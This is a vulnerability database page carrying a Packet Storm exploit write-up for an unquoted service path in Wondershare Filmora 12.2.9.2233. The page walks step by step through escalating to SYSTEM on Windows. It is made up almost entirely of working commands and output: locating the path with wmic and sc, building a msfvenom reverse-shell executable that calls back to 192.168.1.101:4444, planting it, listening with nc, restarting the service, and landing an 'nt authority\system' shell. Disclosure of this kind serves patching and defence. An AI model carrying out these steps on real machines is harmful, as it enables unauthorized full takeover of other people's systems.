Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMsd0pePACKETSTORM:172004
HistoryApr 26, 2023 - 12:00 a.m.

Wondershare Filmora 12.2.9.2233 Unquoted Service Path

2023-04-2600:00:00
msd0pe
packetstormsecurity.com
304
wondershare filmora
unquoted service path
privilege escalation
vulnerability
system level
reverse shell
service reboot
JSON
`############################################################################  
# #  
# Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path #  
# Date: 2023/04/23 #  
# Exploit Author: msd0pe #  
# Vendor Homepage: https://www.wondershare.com #  
# My Github: https://github.com/msd0pe-1 #   
# #   
############################################################################  
  
Wondershare Filmora:  
Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.  
  
[1] Find the unquoted service path:  
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """  
  
Wondershare Native Push Service NativePushService C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe Auto  
  
[2] Get informations about the service:  
> sc qc "NativePushService"  
  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: NativePushService  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Wondershare Native Push Service  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
  
[3] Generate a reverse shell:  
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe  
  
[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe  
> put Wondershare.exe  
> ls  
drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 .  
drw-rw-rw- 0 Sun Apr 23 14:51:47 2023 ..  
drw-rw-rw- 0 Sun Apr 23 14:36:26 2023 Wondershare Filmora Update  
drw-rw-rw- 0 Sun Apr 23 14:37:13 2023 Wondershare NativePush  
-rw-rw-rw- 7168 Sun Apr 23 14:51:47 2023 Wondershare.exe  
drw-rw-rw- 0 Sun Apr 23 13:52:30 2023 WSHelper  
  
  
[5] Start listener  
> nc -lvp 4444  
  
[6] Reboot the service/server  
> sc stop "NativePushService"  
> sc start "NativePushService"  
  
OR  
  
> shutdown /r  
  
[7] Enjoy !  
192.168.1.102: inverse host lookup failed: Unknown host  
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309  
Microsoft Windows [Version 10.0.19045.2130]  
(c) Microsoft Corporation. All rights reserved.  
  
C:\Windows\system32>whoami  
  
nt authority\system  
  
`
JSON